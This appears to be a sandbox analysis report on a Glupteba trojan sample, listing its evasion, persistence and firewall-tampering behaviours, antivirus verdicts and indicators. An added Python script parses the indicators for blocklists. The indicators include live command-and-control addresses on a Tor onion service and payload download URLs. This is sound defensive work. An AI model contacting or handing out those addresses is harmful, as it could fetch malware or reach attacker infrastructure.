Windows Analysis Report
kdsyitkxmS.exe

Overview

General Information

Sample Name: kdsyitkxmS.exe
Analysis ID: 877005
MD5: 01fe6ba28d82175d35665b3eb6ed8cea
SHA1: 45748a6d6474f470d44e848596e0e08bce674996
SHA256: 626df082c2624d9530794881921094aa100fa0a805b1544112d5a07dbe12cbc2

Detection

Glupteba
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected Glupteba
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
Machine Learning detection for sample
Creates files in the system32 config directory
Modifies the windows firewall
Performs DNS TXT record lookups
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Uses STUN server to do NAT traversal
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number, etc.) of a device
Yara signature match
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Enables security privileges
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Name: Glupteba
Description: Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

AV Detection

Source: kdsyitkxmS.exe Virustotal: Detection: 31%
Source: kdsyitkxmS.exe ReversingLabs: Detection: 32%
Source: Yara match File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZ Avira URL Cloud: Label: malware
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/signature/21f67ca2e1b8b0405399c65a0e0d031e Avira URL Cloud: Label: malware
Source: https://duniadekho.bar Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/restriction-usH2 Avira URL Cloud: Label: malware
Source: https://twopixis.com/w/w-8-debug.exe Avira URL Cloud: Label: malware
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll Avira URL Cloud: Label: malware
Source: https://twopixis.com/watchdog Avira URL Cloud: Label: malware
Source: https://twopixis.com/watchdog/watchdog.exe Avira URL Cloud: Label: malware
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNP Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/poll Avira URL Cloud: Label: malware
Source: https://twopixis.com/wupxarch-6162-dcb505dc2b9d8aac05f4ca0727f5eadb.exe Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/restriction-us Avira URL Cloud: Label: malware
Source: https://twopixis.com/smbscanlocal-1bf850b4d9587c1017a75a47680584c4.exe Avira URL Cloud: Label: malware
Source: https://twopixis.com/gm-305-7507ffc9a340f774985cb5ca11ca78c4.exe Avira URL Cloud: Label: malware
Source: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion Avira URL Cloud: Label: malware
Source: https://twopixis.com/watchdog/watchdog.exeSETCONF Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581 Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/signature/ Avira URL Cloud: Label: malware
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion Avira URL Cloud: Label: malware
Source: https://twopixis.com/watchdog/watchdog.exeno-store Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Avira: detection malicious, Label: TR/Agent.twerk
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Avira: detection malicious, Label: TR/Redcap.gsjan
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe ReversingLabs: Detection: 92%
Source: C:\Windows\rss\csrss.exe ReversingLabs: Detection: 32%
Source: kdsyitkxmS.exe Joe Sandbox ML: detected
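The findings above are one-line records of the form "Source: <indicator> <engine>: <verdict>", which is fine for reading but not for feeding a blocklist or a hunt query. The Python below is an added example for this page, not Joe Sandbox code: it parses a handful of lines copied from this section into URLs, hosts, Tor onion services, per-engine detection rates and Avira labels for dropped files. The line layout it assumes is inferred from the lines themselves. The "carved variant" heuristic is the author's, not the report's: strings recovered from process memory often run into the neighbouring string, which is why the section lists both .../watchdog.exe and .../watchdog.exeSETCONF, and a blocklist should carry the shorter form rather than the glued one.

```python
"""Turn Joe Sandbox "Source: ..." finding lines into structured indicators.

Added example, not Joe Sandbox code. REPORT_LINES are copied from the
AV Detection section of this report; the regexes and the carved-variant
heuristic are the author's assumptions about the line layout.
"""
import re
from urllib.parse import urlsplit

REPORT_LINES = [
    "Source: kdsyitkxmS.exe Virustotal: Detection: 31%",
    "Source: kdsyitkxmS.exe ReversingLabs: Detection: 32%",
    "Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll Avira URL Cloud: Label: malware",
    "Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNP Avira URL Cloud: Label: malware",
    "Source: https://server5.duniadekho.bar/api/poll Avira URL Cloud: Label: malware",
    "Source: https://server5.duniadekho.bar/api/restriction-us Avira URL Cloud: Label: malware",
    "Source: https://server5.duniadekho.bar/api/restriction-usH2 Avira URL Cloud: Label: malware",
    "Source: https://server5.duniadekho.bar/api/signature/ Avira URL Cloud: Label: malware",
    "Source: https://server5.duniadekho.bar/api/signature/21f67ca2e1b8b0405399c65a0e0d031e Avira URL Cloud: Label: malware",
    "Source: https://twopixis.com/watchdog Avira URL Cloud: Label: malware",
    "Source: https://twopixis.com/watchdog/watchdog.exe Avira URL Cloud: Label: malware",
    "Source: https://twopixis.com/watchdog/watchdog.exeSETCONF Avira URL Cloud: Label: malware",
    r"Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Avira: detection malicious, Label: TR/Agent.twerk",
    r"Source: C:\Windows\rss\csrss.exe ReversingLabs: Detection: 32%",
]

# Assumed line layouts, derived from the lines above.
URL_RE = re.compile(r"^Source: (?P<url>https?://\S+) Avira URL Cloud: Label: (?P<label>\S+)$")
DETECTION_RE = re.compile(r"^Source: (?P<name>\S+) (?P<engine>Virustotal|ReversingLabs): Detection: (?P<pct>\d+)%")
FILE_RE = re.compile(r"^Source: (?P<path>[A-Za-z]:\\\S+) Avira: detection (?P<verdict>\w+), Label: (?P<label>\S+)$")


def parse_findings(lines):
    """Return {'urls': url->label, 'detections': name->{engine: pct}, 'files': path->(verdict, label)}."""
    result = {"urls": {}, "detections": {}, "files": {}}
    for line in lines:
        line = line.strip()
        m = URL_RE.match(line)
        if m:
            result["urls"][m.group("url")] = m.group("label")
            continue
        m = DETECTION_RE.match(line)
        if m:
            result["detections"].setdefault(m.group("name"), {})[m.group("engine")] = int(m.group("pct"))
            continue
        m = FILE_RE.match(line)
        if m:
            result["files"][m.group("path")] = (m.group("verdict"), m.group("label"))
    return result


def hosts_from_urls(urls):
    """Distinct lower-cased hostnames across all URL indicators."""
    hosts = set()
    for url in urls:
        host = urlsplit(url).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def onion_hosts(hosts):
    """Tor hidden services need a different control than clearnet hosts (DNS sinkholing does nothing)."""
    return {h for h in hosts if h.endswith(".onion")}


def likely_carved_variants(urls):
    """Heuristic: a URL that extends another reported URL without a '/', '?' or '#'
    separator (e.g. 'watchdog.exeSETCONF' after 'watchdog.exe') is usually two
    adjacent memory strings glued together by the string carver, not a real path.
    A base ending in '/' is a directory, so a longer path under it is kept."""
    seen = sorted(urls)
    variants = set()
    for u in seen:
        for base in seen:
            if u == base or not u.startswith(base) or base.endswith("/"):
                continue
            if u[len(base)] not in "/?#":
                variants.add(u)
                break
    return variants


if __name__ == "__main__":
    found = parse_findings(REPORT_LINES)
    hosts = hosts_from_urls(found["urls"])
    print("hosts:", sorted(hosts))
    print("onion services:", sorted(onion_hosts(hosts)))
    print("probable carving artifacts:", sorted(likely_carved_variants(found["urls"])))
    print("detections:", found["detections"])
    print("labelled dropped files:", found["files"])
```

The clean URL set is `set(found["urls"]) - likely_carved_variants(found["urls"])`; the hostnames are the durable indicators, since the C2 paths in Glupteba-style reports change between samples while the domains and the .onion address are reused.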

Bitcoin Miner

Source: Yara match File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR
Source: kdsyitkxmS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\rss\csrss.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Uninstaller
Source: Binary string: System.Data.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: symsrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: System.Transactions.ni.pdbRSDSc source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: symsrv.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: EfiGuardDxe.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dbghelp.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dbghelp.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Loader.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 00000035.00000002.209085027998.000000006B5CD000.00000020.00000001.01000000.00000014.sdmp
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
